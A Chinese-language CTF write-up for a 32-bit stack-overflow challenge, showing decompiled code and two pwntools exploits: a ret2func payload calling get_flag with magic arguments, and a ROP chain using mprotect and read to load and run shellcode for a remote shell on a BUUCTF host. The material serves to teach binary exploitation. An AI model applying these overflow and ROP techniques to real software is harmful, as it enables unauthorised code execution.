emmm最近一直埋头于csapp,作一道题回忆回忆之前作的。这道题太大了,在main函数上方有个get_flag函数。node
int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [esp+4h] [ebp-38h] printf("Qual a palavrinha magica? ", v4); gets(&v4); return 0; }
void __cdecl get_flag(int a1, int a2) { int v2; // eax int v3; // esi unsigned __int8 v4; // al int v5; // ecx unsigned __int8 v6; // al if ( a1 == 814536271 && a2 == 425138641 ) { v2 = fopen("flag.txt", "rt"); v3 = v2; v4 = getc(v2); if ( v4 != 255 ) { v5 = (char)v4; do { putchar(v5); v6 = getc(v3); v5 = (char)v6; } while ( v6 != 255 ); } fclose(v3); } }
漏洞是典型的栈溢出。须要咱们进行填写。最开始向直接跳入get_flag函数,结果不能正确获得结果。看了看其余大佬的EXP,发现要有什么限制,必须维护好栈,因此地找一个函数来退出。因而利用了exit函数linux
from pwn import * context(os="linux", arch="i386", log_level="debug") sh = process("./hhh") flag_addr = 0x080489A0 # 0x0804E6A0为exit地址 payload = cyclic(0x38) + p32(0x080489A0) + p32(0x0804E6A0) #后面俩个对应的是函数参数 payload += p32(0x308CD64F) + p32(0x195719D1) sh.sendline(payload) sh.recv() #注意main函数没有push ebp
另一个大佬的ROP利用
这里利用了一个后门函数
![上传中...]()shell
from pwn import * #coding = utf-8 context(os="linux", arch="i386", log_level="debug") q = remote('node3.buuoj.cn',25023) elf = ELF("./hhh") mprotect_addr = elf.symbols["mprotect"] read_addr = elf.symbols["read"] start_addr = 0x80ea000 pop_3 = 0x0804f460 payload = cyclic(0x38) payload += p32(mprotect_addr) payload += p32(pop_3) payload += p32(start_addr) payload += p32(0x1000) payload += p32(0x7) #7具备rwxp payload += p32(read_addr) payload += p32(pop_3) payload += p32(0) payload += p32(start_addr) payload += p32(0x100) payload += p32(start_addr) shellcode = asm(shellcraft.sh()) q.sendline(payload) sleep(0.1) q.sendline(shellcode) q.interactive()